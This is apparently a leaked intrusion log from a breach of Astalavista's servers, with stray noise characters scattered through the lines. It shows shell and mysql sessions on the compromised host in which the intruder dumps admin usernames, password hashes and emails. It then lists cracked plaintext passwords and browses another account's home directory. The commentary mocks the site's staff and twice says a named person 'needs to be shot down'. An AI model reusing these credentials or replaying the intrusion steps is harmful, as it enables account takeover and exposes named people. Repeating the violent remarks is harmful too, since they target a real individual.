<link>http://www.astalavista.com/exploits</link>
' |- D$ r9 G/ K! l$ G7 Y1 X, g5 N <description>All availably Exploits.</description>% g0 o$ H0 X6 ~1 s' R
<language>en-us</language>
, ]1 O8 _8 q2 d <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>4 ~1 c- H8 S; L3 p* I9 |1 r- {
<docs>http://blogs.law.harvard.edu/tech/rss</docs>/ c# d" C8 V+ \# I1 _9 |6 r
<generator>Astalavista.com</generator>6 W8 A. W' k% C( L n$ P
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘: _" h: ?" f! r, H
</channel>2 o* T4 @' t; m: l, c) K
</rss>’;
3 V- l, @2 ^& E2 X& k7 S9 w5 w' I: n2 p+ e6 q+ Q' R
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {* K9 |1 x, n- q# n* o/ _
unlink (FULLPATH . ‘/feed/exploits.xml’);/ U" ~% y, U/ X, e
}
8 R$ { b0 n4 ~5 C8 _6 U1 g- N! v9 V- o" ]
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
0 C- _! {. g* k! P: q' l, Q[snip]
: O& @8 A3 A! Q4 U9 T* u0 n, L
5 P: l1 C( k0 T Y8 f, d# g6 Y" @sh-3.2$ cat exploits.sh
: v3 m7 U7 @6 K8 [#!/bin/sh4 |6 i0 c# n6 v- F( @
\: D3 `# e) P7 U
###########################################################, k) x, h4 c* H: @
# #
v6 T; N0 F$ o& B# Title: milw0rm exploits adder #
9 \. B, U6 X. r7 }6 b" G& U# Description: Add all milw0rm exploits to the #9 \* E8 F; L# [
# Astalavista.com database #
, t6 z! K9 [, b% |, ~# #
, T* d6 g0 G' Z0 w# Company: Astalavista Group #- O1 S7 g6 \" L" l
# Author: Paulo M. Santos #- b1 b; K# _, y# Z: R9 w/ |
# E-Mail: 链接标记paulo.santos@astalavista.ch #/ A* _# x( N$ x. [( [
# #
' w" U9 F' x* q u4 |# k0 a& }###########################################################+ y2 v! m r5 J- J! Y7 Y) g7 b
T2 y( r8 } ?" w- q' v# a9 |
# path
+ t3 s! J8 V6 R: }( g8 X/ e. ]this_path=/home/com/public_html/modifications/cronjobs5 x: I5 X+ w3 X4 {
; q+ p D' K# K& q" f1 a/ w/ U' ~: p! Z, G# change directory
3 d9 J" H: F" {& j8 A. I" |& R7 ycd $this_path
( W, ]2 o4 ?* scd tmp/
5 B& E5 R) T# B. x
]5 e6 r8 P0 g* S" w- D6 m5 q, Y# delete files
' [0 v5 Q% A' \0 ^! f' D$ brm -rf milw0rm.tar.* &
* E% b3 {; |! q3 T; ?. P# Wrm -rf milw0rm/ &
' g* H* r: H- |( C9 e4 d; |3 W$ Q* C
# wget milw0rm paket
# t) k* }9 @0 J- {1 K4 X7 R- E& ]5 P( Uwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]3 H( E m m5 ]- e, k
: }! p: e9 [3 K2 U2 H# extract milw0rm paket
- B! g/ _6 L6 z! [8 o/ n: H- ]tar -xvf milw0rm.tar.bz2; j$ @% R- ?9 |* \1 G- q
& w8 z' J* l/ J2 k
# change owner
/ K1 d/ |# e/ g" n i! tchown -R com .3 E+ T* w1 ~. D% I, u" s
chgrp -R com .1 B( `' `) h2 h$ U3 E
# e! V N$ O& r# j# execute php script
7 V5 [* }' Y# X* icd $this_path
+ d" n/ C* N2 w' v1 ]php -q exploits.php
) E- ^3 q; V7 C$ [' K
# f& ^2 A- N9 \/ Q. Q# delete files0 ]9 U) ?7 J: R. \5 l
rm -rf tmp/milw0rm.tar.*. W( d, p& g1 ] J# m. R ?- R
rm -rf tmp/milw0rm/
! w; h8 `9 h# f
7 x) ~* n: G# R, t) a1 k2 ush-3.2$ echo “Paulo M. Santos needs to be shot down.”* r* D7 G5 Q/ {
Paulo M. Santos needs to be shot down.
) K9 j! I- [- k4 X5 D3 F S% B, v9 h3 }2 J! S
mysql -u contrexxuser2 -p
' S0 {8 J( u1 a& O7 L9 g9 HEnter password:
3 C F% a0 a+ G6 I6 m, G' _% rWelcome to the MySQL monitor. Commands end with ; or \g.1 t3 j, Y; p9 j
Your MySQL connection id is 261694! S3 Q# Z4 z( r+ J
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
; \5 A' J7 {& E; d/ a
! ~. d4 a2 S0 L% aType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.8 t3 X5 ?, g8 u
- }$ ~; K, g# m2 v5 ?mysql> show databases;4 e! [' M, R" W8 u
+——————–+8 {# X' f/ p/ g s! a# S) q: ]
| Database | f: ?, n. Y# B3 G$ p+ W/ Z; K
+——————–+4 u$ _$ p9 S! j8 p# u
| information_schema |: C) j7 N0 L4 f }
| com_contrexx2 |
( }7 ?2 z4 F5 l+ b1 `1 S| com_contrexx2_live |
- x K$ ^1 { y6 w: v1 u| test |
' `7 g. c: _+ W+ y; C, {+——————–+
' Y/ {5 T: F0 @$ u; m2 f6 x4 rows in set (0.00 sec)
`8 {$ S+ ~' n0 d9 }% I3 b/ e9 v8 o. z
mysql> use com_contrexx2_live- _6 _+ i* Y2 i" q# n
Database changed
/ \7 X" e$ B, k( ]" dmysql> show tables;
7 { R# i9 I9 w# X& n- F% E7 t# [+————————————————–+
6 G3 U- x2 v+ h| Tables_in_com_contrexx2_live |& p9 X% ~' l! ~! T
+————————————————–+
! Z4 g8 k' k6 t8 s3 I# I' B9 R| cc_banner_counter |9 v9 }9 D$ b- P: h D
| cc_search_counter |" z3 f- B$ Z/ p) b1 _
| contrexx_access_group_dynamic_ids |) Z3 O- e/ X4 A- L' q# f
| contrexx_access_group_static_ids |: N5 O# v- n z; s% r
| contrexx_access_rel_user_group |4 [* p8 F; t! F4 E% K7 M- _
| contrexx_access_settings |) F# f2 K/ D+ Z$ Y$ S
| contrexx_access_user_attribute |4 o8 w7 L' {7 f M7 G3 O, p- Q
| contrexx_access_user_attribute_name |1 m/ w. y# f. A$ D+ Y1 P% M7 G/ |
| contrexx_access_user_attribute_value |
" [2 O+ j8 Y% b. V2 s( ^4 U* _) ~" R| contrexx_access_user_core_attribute |7 {+ B, |$ l! L- y* ^* w# ]
| contrexx_access_user_groups |. m" Y e7 d1 W
| contrexx_access_user_mail |. j( Z# p* q9 q! N4 b5 G
| contrexx_access_user_profile |$ ]3 B5 A) |+ G. ]2 v6 K
| contrexx_access_user_title |
7 ]4 ^% I/ ^7 W" S& w; \- J6 \| contrexx_access_user_validity |+ [( \& l0 {( ]# D/ ]
| contrexx_access_users |
$ ]& x8 }/ H& e" g3 @: K& B3 G$ F| contrexx_backend_areas |+ Z' a: s/ R U: y0 }. u
| contrexx_backups |8 ]1 G1 F9 L7 q) ~# S
| contrexx_content |7 R$ O: t5 x6 E9 Q6 g, M
| contrexx_content_history |
0 H( z' A4 f T8 Q/ x| contrexx_content_logfile |. F- p2 Z5 k0 V" s; z9 [
| contrexx_content_navigation |) D. T2 x5 I f9 w% }" r
| contrexx_content_navigation_history |7 e0 N$ N! Y8 K0 p* V* K1 v
| contrexx_ids |' |: |) E" g$ W1 {9 j+ Y
| contrexx_languages |6 G4 y; V; n( L
| contrexx_lib_country |; k3 o6 Q- C4 D, e" b; u
| contrexx_log |
0 V6 s6 S1 i5 e( t" B$ R: ^2 y0 E; T| contrexx_module_alias_source |( C D6 i1 @1 \/ k+ j$ F. o' A+ M
| contrexx_module_alias_target |3 K* S/ E% D+ n0 |5 `$ I' S2 d; k
| contrexx_module_block_blocks |4 k6 |; s/ s7 C5 G! N) W
| contrexx_module_block_rel_lang |* T, q0 Y4 x' A/ h; ]9 v/ T% u
| contrexx_module_block_rel_pages |0 ?& V' _4 n' m" O. K! c
| contrexx_module_block_settings |3 |: D' m& f+ I( Q! `2 k/ Q: ^
| contrexx_module_blog_categories |1 N7 M3 Y* E& `
| contrexx_module_blog_comments |
, V1 }" j: P: @| contrexx_module_blog_message_to_category |6 [6 i; f. I7 e2 d. u
| contrexx_module_blog_messages |7 Z$ s3 g4 E& k: G, G
| contrexx_module_blog_messages_lang |& _. w. h- d! g8 x1 K0 K Y
| contrexx_module_blog_networks |* b1 D1 }* d' g( S- e |4 W+ _. O
| contrexx_module_blog_networks_lang |! B% F. t l' e" N6 R4 n
| contrexx_module_blog_settings |
2 a9 ` L$ e: H3 I, ?| contrexx_module_blog_votes |
. C% f# Q: v8 r! m8 F4 O| contrexx_module_calendar |2 M) ^! K: n: J; u
| contrexx_module_calendar_access |
! I5 X( N: ?8 d9 t6 G }| contrexx_module_calendar_categories |6 n: d8 F, ]; j& r5 s
| contrexx_module_calendar_form_data |( r' E; \# T* ]3 {
| contrexx_module_calendar_form_fields |
$ a4 \$ ?7 N0 `5 u| contrexx_module_calendar_registrations |5 x/ U! s- L+ l, H8 ~7 e
| contrexx_module_calendar_settings |
$ I b, y n2 I% Q1 o- \4 O| contrexx_module_calendar_style |
) B7 H& G4 ]" K! W8 C: Y| contrexx_module_contact_form |
7 {1 C( h* D- j0 {6 @| contrexx_module_contact_form_data |7 T3 i) s, w' G# n# y
| contrexx_module_contact_form_field |0 Z+ _& @* H2 C- B1 L4 l5 Q
| contrexx_module_contact_settings |' [6 X( y3 ]" o$ u8 L0 W# t
| contrexx_module_data_categories |
6 Q/ u; d5 r$ g4 W* {9 U| contrexx_module_data_message_to_category |, M3 w' i" m$ E) Y" `
| contrexx_module_data_messages |% [ N0 P0 z$ K! i+ R. p6 F% O* S
| contrexx_module_data_messages_lang |
* b$ ^; P$ e; Y5 \5 C| contrexx_module_data_placeholders |4 Z- J+ b( C4 ~% b: K' Z" H
| contrexx_module_data_settings |- e. p! f0 e h: L7 u
| contrexx_module_directory_access |
2 f) ]. }5 c/ g: e6 {% J, K| contrexx_module_directory_categories |& L5 A! Y$ e: E1 R
| contrexx_module_directory_dir |; H* H' i2 P! U' d" {
| contrexx_module_directory_inputfields |
p2 k6 D. C# _: O) r7 f| contrexx_module_directory_levels |
7 F- C% c ~0 T- y, ?| contrexx_module_directory_mail |
( w4 [+ o- R2 u- N! H% \% p: A| contrexx_module_directory_rel_dir_cat |- R' g! U( [& a7 p) \
| contrexx_module_directory_rel_dir_level |6 o3 a+ e7 w9 p! G
| contrexx_module_directory_settings |
+ j7 V7 ^% O+ a3 U6 e| contrexx_module_directory_settings_google |7 F( q c. m% V9 W. k0 {
| contrexx_module_directory_vote |, ~- i9 d' p+ n" [1 U
| contrexx_module_docsys |" N8 M1 f/ u- I7 Z( a+ H' j H
| contrexx_module_docsys_categories |! D$ }: M2 x; L0 k9 Q4 O
| contrexx_module_egov_configuration |% T! M$ ]9 ~8 N1 c9 r- L- M
| contrexx_module_egov_orders |
* d/ R5 U# E; n$ v- J7 I* M# J7 c| contrexx_module_egov_product_calendar |
4 p! z7 E# {+ n3 c# u: Z" o+ || contrexx_module_egov_product_fields |
3 I" _: y, D" g# q. i' e0 [| contrexx_module_egov_products |- F0 y: M9 y+ v# H# l P
| contrexx_module_egov_settings |
) h' l1 }! G9 {- \/ ~| contrexx_module_exploits |5 P# Y7 B8 V% n% R- }
| contrexx_module_exploits_categories |8 r2 h1 A, a8 T. p
| contrexx_module_feed_category |
% Y+ p0 e! @! J6 o" D| contrexx_module_feed_news |" D; g" j, N$ m" G
| contrexx_module_feed_newsml_association |
! ?2 [- ?! {8 Y0 O- P$ C| contrexx_module_feed_newsml_categories |4 v# Z, e6 {6 H# N o& D
| contrexx_module_feed_newsml_documents |
+ v8 H1 ]/ l& z, G3 i$ j! a) O| contrexx_module_feed_newsml_providers |! E* ^9 `/ s6 e
| contrexx_module_forum_access |% `' a* t H1 t) ?! U
| contrexx_module_forum_categories |" b% q+ B$ s/ a7 b: l% ?
| contrexx_module_forum_categories_lang |! _5 F$ t# w2 r* f0 y6 ?
| contrexx_module_forum_notification |
# C" a9 A9 k7 A. }# n) M| contrexx_module_forum_postings |
4 |7 o, @7 Z. D) r& A| contrexx_module_forum_rating |6 }6 ?/ C! v2 r2 c& C
| contrexx_module_forum_settings |
. g' W3 f% V9 C- M| contrexx_module_forum_statistics |
. A* A1 Y- A& N5 M$ n' |! ^1 n| contrexx_module_gallery_categories |1 w p: C. N; ]: s- `8 }7 n
| contrexx_module_gallery_comments |7 p! @- p1 `$ X* K
| contrexx_module_gallery_language |
4 e" y& X, H0 l; k9 d| contrexx_module_gallery_language_pics |% z9 P7 Y9 Y4 v6 I( f5 r3 Y
| contrexx_module_gallery_pictures |: f c/ D. Z2 G1 m6 B: C
| contrexx_module_gallery_settings |: W4 m) l2 M, s4 @$ @! V
| contrexx_module_gallery_votes |2 o% c! N1 m' ^. t% W6 i' f
| contrexx_module_guestbook |( v7 Y) y8 i2 ~ C+ f
| contrexx_module_guestbook_settings |. \! G/ J& d! R) Z i, o% M
| contrexx_module_livecam |& N9 P( R- ^ N% u2 Y* S9 T5 G2 ?, o
| contrexx_module_livecam_settings |
( A' n/ Z% U: N2 p| contrexx_module_market |- q8 ~$ ] H; D. s9 Z+ P# U$ w' q
| contrexx_module_market_access |3 i1 R8 B- K4 [( T
| contrexx_module_market_categories |) ]& ?; D7 [! r- S! f
| contrexx_module_market_mail |
! k( C3 F4 Z9 {| contrexx_module_market_paypal |
( i- ~4 V$ G0 {- x3 e- L, {7 k# [| contrexx_module_market_settings |% x# ~( f |3 M& P( K' D) d6 e0 M
| contrexx_module_market_spez_fields |, w# Y# J# u% \+ w6 P
| contrexx_module_mediadir_access |
& z& q7 \% S/ H% k| contrexx_module_mediadir_categories |
/ f! q2 J" k; j$ X| contrexx_module_mediadir_comments |7 u3 q8 e) ~ A, f, u: t
| contrexx_module_mediadir_dir |
5 F" h, Z* p5 i* S' \: s| contrexx_module_mediadir_inputfields |8 p9 F9 T% \1 M. j: o8 s
| contrexx_module_mediadir_levels |* g! g1 n: k5 E5 C2 F
| contrexx_module_mediadir_mail |: `' A7 R$ ?# Z& g8 w8 w- L6 Y, o
| contrexx_module_mediadir_rel_dir_cat |
0 N4 H+ u: ^7 s6 j| contrexx_module_mediadir_rel_dir_level |' s! F. e/ Y5 G$ L/ E3 E1 l
| contrexx_module_mediadir_reports |
# a6 H% o5 j! ~/ k* F9 r| contrexx_module_mediadir_settings |6 g1 a6 d. g' r
| contrexx_module_mediadir_settings_google |+ q3 l1 \- P, w- t. ^9 s' \5 }
| contrexx_module_mediadir_vote |. p. N7 k) ~- Z9 |& D
| contrexx_module_memberdir_directories |* B' |2 f$ f; {. M' {
| contrexx_module_memberdir_name |
2 b3 G) ?* X1 P Z: o! ]% a6 ?| contrexx_module_memberdir_settings |! Q4 x, \( Z e* J
| contrexx_module_memberdir_values |
" N7 p( Y& v8 ^) E7 D6 G9 @| contrexx_module_nettools_allowed_groups |% h) _4 p( X$ ? }
| contrexx_module_nettools_settings |" _2 `( J7 S7 c3 N8 b. y' U# ]# B
| contrexx_module_news |7 M$ \4 p" z& {) O
| contrexx_module_news_access |
4 f8 H, ^ ~! d1 L9 h" Q| contrexx_module_news_categories |
; w* u! Q# j8 i. V7 L| contrexx_module_news_settings |! B) v* J. b8 @9 l. _
| contrexx_module_news_teaser_frame |7 h p2 ^8 g3 s* R3 }3 U! T: y
| contrexx_module_news_teaser_frame_templates |
! ^+ D: R6 Y: ?$ ]3 u1 i| contrexx_module_news_ticker | e* d& J' t( X J# ~1 j
| contrexx_module_newsletter |( f, m! b! @0 t+ _+ e8 q4 [
| contrexx_module_newsletter_attachment |
3 l" S- g8 l8 O$ j! R% g0 `| contrexx_module_newsletter_category |" k' v# M4 T" u% y9 ]/ H% ^
| contrexx_module_newsletter_confirm_mail |: [% p. O# U* J: z1 _* j2 k6 Q" p! n
| contrexx_module_newsletter_rel_cat_news |, F- L+ Y6 \5 t, a6 L* m! j+ {
| contrexx_module_newsletter_rel_user_cat |( t" k8 T6 e! s& _- H
| contrexx_module_newsletter_settings |* l! {$ W3 s w
| contrexx_module_newsletter_template |+ J; g) y/ h- G& y2 @; H
| contrexx_module_newsletter_tmp_sending |3 X$ r- H& }4 W; }2 v4 X
| contrexx_module_newsletter_user |
1 P, G4 f- f; I M) h. ^| contrexx_module_newsletter_user_title |
+ e4 U* a3 @8 y# j' q1 @| contrexx_module_onlinetools_defaultports |- E/ m! m, h/ L# J X4 x0 h
| contrexx_module_onlinetools_defaultports_back |
2 T# O& h0 J7 S K$ } X- M| contrexx_module_onlinetools_geolitecity_blocks |8 ?6 ~1 O) |3 G4 K/ ^' d4 v7 h
| contrexx_module_onlinetools_geolitecity_country |
; ]+ }0 z" O: i% ]| contrexx_module_onlinetools_geolitecity_location |
0 p% c( g. H4 Q& a| contrexx_module_podcast_category |
7 z* }1 v8 V& a- f/ d( V3 t+ ]| contrexx_module_podcast_medium |
4 q" G4 a! w+ w| contrexx_module_podcast_rel_category_lang |
( K9 y1 _. J& f+ e$ {| contrexx_module_podcast_rel_medium_category |' K' [$ ]# P+ R6 T, t
| contrexx_module_podcast_settings |0 ]: `; m3 L. E; Y& e+ V
| contrexx_module_podcast_template |* b; L5 e7 V9 j: e
| contrexx_module_proxydb |; L1 t7 }6 q2 S: H4 v/ s* j- N
| contrexx_module_recommend |! c0 t# b2 U* i+ J5 i
| contrexx_module_repository |) q( i$ u" Y7 H$ v9 M6 E S9 o4 ~
| contrexx_module_securitynews_cats |
' k2 x# ]5 w8 u* v| contrexx_module_securitynews_feeds |8 J6 d, [9 i% L; W! \% e; W+ e
| contrexx_module_securitynews_news |
: |. _+ W: G) E6 g| contrexx_module_shop_categories |/ E: `" E' H6 w1 m1 V6 u; c
| contrexx_module_shop_config |
& ]7 H( Q0 }) Z' K/ l2 {: o| contrexx_module_shop_countries |9 t8 v/ u7 A: v( Z' B$ v& A6 F0 ^
| contrexx_module_shop_currencies |
& q& F( x' K" S _5 O! \. F| contrexx_module_shop_customers | a4 f! ?) z# t* e, [/ P$ A- ~
| contrexx_module_shop_importimg |
. i2 U! m" g5 O1 c4 a. Y z S| contrexx_module_shop_lsv |6 m8 t" o) R0 x# s* N
| contrexx_module_shop_mail |- G& l, T* O! v6 I) u. Z
| contrexx_module_shop_mail_content |0 C. q2 Q+ s5 A+ }# |* _$ \
| contrexx_module_shop_manufacturer |
4 \6 l0 g! z' p. @+ {| contrexx_module_shop_order_items |
9 ?* U5 P; [/ o% K| contrexx_module_shop_order_items_attributes |1 M6 e. X0 K; Z, V- H
| contrexx_module_shop_orders |
9 }* D: \7 `& v! _/ ^1 p| contrexx_module_shop_payment |6 E8 \8 W. t+ }" z
| contrexx_module_shop_payment_processors |0 e0 j* a t( H: M! F5 x
| contrexx_module_shop_pricelists |
# N6 q5 G) I) }% e| contrexx_module_shop_products |
7 z, C! w8 [. E2 ?( x7 ]# _' J| contrexx_module_shop_products_attributes |
; \6 ^8 Y$ R( b8 I7 [| contrexx_module_shop_products_attributes_name |) m" l4 N' q+ j% y5 u3 P7 }
| contrexx_module_shop_products_attributes_value |
0 `+ {& ~* ]- N7 ^, ~' v( Q| contrexx_module_shop_products_downloads |
0 e4 M+ L: E! P* }& l| contrexx_module_shop_rel_countries |& d( Z) L0 R4 E, _4 A8 a
| contrexx_module_shop_rel_payment |
" N k& X" n5 k* |* h" m| contrexx_module_shop_rel_shipment |6 P# w; Y" {% @+ ^- m: N* F
| contrexx_module_shop_shipment_cost |0 I. K) k' f+ B. f
| contrexx_module_shop_shipper |( c) L# }3 }0 ?, y. _( a' W9 a7 s
| contrexx_module_shop_vat |
( A& J6 [5 h, ^+ r ]$ F| contrexx_module_shop_zones |6 b" _+ o1 _, G. @. r) S7 b; f
| contrexx_module_u2u_address_list |8 s7 p6 B. o, F: z
| contrexx_module_u2u_message_log |7 g" {% `. W9 L
| contrexx_module_u2u_sent_messages |
( l& V" s4 x$ N. T* P" P j$ A9 f3 k# h| contrexx_module_u2u_settings |5 n/ k$ R0 l$ W3 A. N" p- _
| contrexx_module_u2u_user_log |4 i" _! |4 Q" Z. K7 X
| contrexx_modules |! t1 d# B. N3 _3 D4 @9 c
| contrexx_sessions |4 W0 T+ @! g4 D5 \' M3 G2 ^
| contrexx_settings |
9 H/ q+ [: m6 K| contrexx_settings_smtp | m2 J0 h) {5 Y, S3 f0 z4 N
| contrexx_skins |' K( a0 x) o9 Y9 D+ f! d+ E" p
| contrexx_stats_browser |
e: C9 C% y+ T$ H2 x8 r8 T$ B, `# {& U0 e| contrexx_stats_colourdepth |
" C- e. L7 Z! W9 P5 G' u| contrexx_stats_config |
}; M9 T% n7 W o| contrexx_stats_country |
" O% r9 F2 f% I# b2 _) a* w| contrexx_stats_hostname |% _* c$ m2 b4 K ^
| contrexx_stats_javascript |* ?" W$ Y3 q- A: a. s( s/ b4 O
| contrexx_stats_operatingsystem |2 c8 f: O( b; |9 [# C7 _$ L
| contrexx_stats_referer |
7 S$ S" ^ F: i| contrexx_stats_requests |7 S* g$ v( ?8 r; z
| contrexx_stats_requests_summary |6 n0 d* c0 M9 i
| contrexx_stats_screenresolution |
9 R, b# m# O. u% @6 d3 d4 ]| contrexx_stats_search |
0 e% Q) r/ u# M0 w1 C. B| contrexx_stats_spiders |
# O# W% }6 T* `| contrexx_stats_spiders_summary |
& U2 d; S, f: | s2 K| contrexx_stats_visitors |5 k" l6 b2 V+ C) D1 G
| contrexx_stats_visitors_summary |7 G: Z D q8 ]* k% ^- o) J- u
| contrexx_voting_additionaldata |
" R- V' R$ e( k; @, b8 Y- r% p) o| contrexx_voting_email |
6 Z; q0 h( G% G2 z M| contrexx_voting_rel_email_system |9 k# a. c- e+ L
| contrexx_voting_results |
6 w" l( w# N9 @1 d- i# O| contrexx_voting_system |
4 y- o* |: ?; b| foo |
7 h$ @" K% X" k" T6 x+————————————————–+
& _6 `4 T9 Z& g5 ]227 rows in set (0.01 sec)
1 @3 m& x2 X4 T- [$ d/ u3 }) I' q6 T" W3 g" H H+ x1 [; V
mysql> select count(*) as skids from contrexx_access_users;
, x) a: r Q& V' M+——-+* l, m; N( j; _
| skids |
: v9 K. T" J7 }5 Z4 Z* u, O7 `/ o8 K+——-+
/ p5 L5 r& E& ]( k* R| 53699 |8 _' e$ F- x1 a0 A" D7 l
+——-+
0 m+ V% ~, y# F1 row in set (0.00 sec)9 J3 S6 D- M2 l9 h- f" X
+ [' S2 b7 v1 W; o8 G, |& h
mysql> describe contrexx_access_users;
" [! _3 Q: `+ X( G: c9 a, x+——————+——————————————+——+—–+————–+—————-+
' n r" ]* A7 f) p- P0 @; w7 O( j| Field | Type | Null | Key | Default | Extra |; `1 r! I: |# B; z7 R3 Q8 H9 J
+——————+——————————————+——+—–+————–+—————-+% A$ n+ M- N8 p z- }4 n7 x% z+ V
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
# @( I8 F2 ]" C5 x/ g( E| is_admin | tinyint(1) unsigned | NO | | 0 | |
) _0 _. s9 x+ E. I| username | varchar(40) | YES | MUL | NULL | |
# E* D2 q. M6 B A6 Y0 U6 Z2 ~| password | varchar(32) | YES | | NULL | |
$ ~3 N. N# O' a0 k| regdate | int(14) unsigned | NO | | 0 | |* @9 g( X% m" {' |0 Z) Z. }
| expiration | int(14) unsigned | NO | | 0 | |
' S, _. o9 Z3 S5 o/ T| validity | int(10) unsigned | NO | | 0 | |
% f7 B2 q1 x1 T9 M* J. y0 @0 n8 n| last_auth | int(14) unsigned | NO | | 0 | |4 q4 O- w& _, A; u& k* S* V! {
| last_activity | int(14) unsigned | NO | | 0 | |
) ?/ o& p8 M( p& [8 }| email | varchar(255) | YES | | NULL | |
; H" j J6 A& C0 J. w5 X| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |3 z! e' w% M9 g' V
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
9 T7 y# O+ g# X- j4 j9 @1 F. j| backend_lang_id | int(2) unsigned | NO | | 0 | |% t* ?! T5 i2 o% T6 g1 b! x
| active | tinyint(1) | NO | | 0 | |4 F0 A* o% e5 L& l
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |6 D4 S" Y, D( W& {+ U. j/ N
| restore_key | varchar(32) | NO | | | |
; b. W0 c+ D( |# ~2 X6 Q& [| restore_key_time | int(14) unsigned | NO | | 0 | |
2 n$ A6 ?+ H- Y H% B) v$ N| u2u_active | enum(’0′,’1′) | NO | | 1 | |" O0 h$ Z0 T# |
+——————+——————————————+——+—–+————–+—————-+
" @' `7 q8 f, c0 ~18 rows in set (0.00 sec)% T, k6 T. q" X; Z
# u! J% d6 h5 M8 n; |
mysql> select username,password,email from contrexx_access_users where is_admin = 1;7 [* K. i/ }0 ?
+————+———————————-+—————————–+/ x! s _4 V' V: k2 [4 M) c6 U! H& P
| username | password | email |8 f9 Q- X6 r4 ]; e0 j, x7 I
+————+———————————-+—————————–+
1 ^# \" N9 Q2 L8 G( r| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |2 l1 a) N. z% w$ g8 X- k' v9 S+ s
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |' U, q! I9 p! C
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |* ^4 f2 z- H/ T" x* @" r% S8 a
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
6 ]" E+ @4 {( Y+————+———————————-+—————————–+/ s7 c# L1 p; @+ R
4 rows in set (0.04 sec)7 E4 L* u5 S$ K
2 F2 ` S% S3 X
mysql> exit;
5 c1 V0 M) h$ H s; f1 |' DBye r( e5 ~& p5 D
* t j- {" }$ T- U0 j* A[~] There you go, your “team of security and IT professionals” is a joke.( x9 {9 c9 ?4 G1 w# _
5 @7 m, d$ m0 w. l1 q0 ~2 O0 @
+——————————+
. b8 g6 d/ _0 d2 G3 R$ H. z% Isystem:f82BN3+_*
9 S! p3 c' f: \. i cBe1er0ph0r:belerophor4astacom
1 m& C8 h T+ M' F0 w" D# [prozac:asta4cms!$ u& ]$ n. h9 I$ n y
commander:mpbdaagf6m* [5 X5 i( y, g0 l
sykadul:ak29eral/ H3 K- Y: ]7 D: Y9 Z
+——————————+) f- P9 V; `1 w* d
& M* I# M$ I* S* u[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)# Q% X5 R% ~! _( a" U# S/ Z/ F
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it." ]8 H; n+ u$ h4 E& A. ]7 u) k
5 e, b5 H4 m7 k5 s
[~] Lets move to astalavista.net now,# }) y, j6 P( t1 w* U2 V' s' v
! b" j6 ^, ?, a: V9 WFrom <链接标记[url]https://www.astalavista.net/[/url]>:; q4 X$ f* ?2 t! G
>> Everyone knows that the best defense is a good offense.9 {' D6 \1 Y+ J- n& ]2 N& R
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.1 z, |( B, Y0 `" H3 w* L
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.' m+ R& X8 M2 T
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
4 @0 c* A. J) N O& N. |+ f0 U8 O# E/ r$ K, e# z# _/ R* F1 d
>> Go ahead, try and hack our server . in a completely legal way!
9 c" p+ A. G- q, _6 ~* r7 t>> Learn by doing: We offer our members tricky tasks and challenges on an4 [/ C/ A/ [- C3 ]9 Y( z
>> ongoing basis so you can test your knowledge and abilities. You can also
; I) ^3 e& x4 i& V, l( z>> demonstrate what you.ve mastered by taking part in regular hacker contests# I' R+ k7 P8 ^6 M' J& `$ W6 T
>> and war games7 Q, l3 b8 N- U( ~
* D$ W2 r6 P- |5 K7 l
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
4 Q8 c# ]& x' ^7 w' O) A) B5 Q$ b& I5 k
[-] Tricky task: Find home dir of astalavista.net
. o1 o; f2 d$ a1 e$ ^" T& S* \ T& M
sh-3.2$ ls -la ~astanet
1 B# k# T% ~. }; f: l2 Ftotal 480 j6 z3 E$ ~% _1 N, _
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .7 ?' N1 a) g0 w7 U& |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
E9 Y( E5 w2 ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth t4 r4 _. t, |- k `7 D# y$ a
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 b. L# p0 ]; \+ q' P! |-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout: \6 N1 z1 ?! N! a$ O$ C* C3 e' h
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 p; { R( _+ m& H+ M4 ~( W% `
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
1 ?+ q) t) h- H6 g/ h' F8 H0 M7 M) \' [drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
w1 _- |5 G" B' k, tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap' Q$ r& T/ y- d$ r* ?# g# ~
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail& D& ?5 q% s3 _; Y$ o
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html4 Q& A0 D- i3 T! v# _1 g$ z! w
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
& z( f5 E' m% \0 F2 ^/ u) a( S! d* q6 `) Z
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/( n& ^ F$ D/ w1 z+ V; B4 V1 [
sh-3.2$ ls -la; f7 u$ S; ~; ?- P0 Z
total 200
' p8 u: `3 ]# k/ e1 p4 }drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .2 R! U& S4 o! q. K) @0 J$ w% P
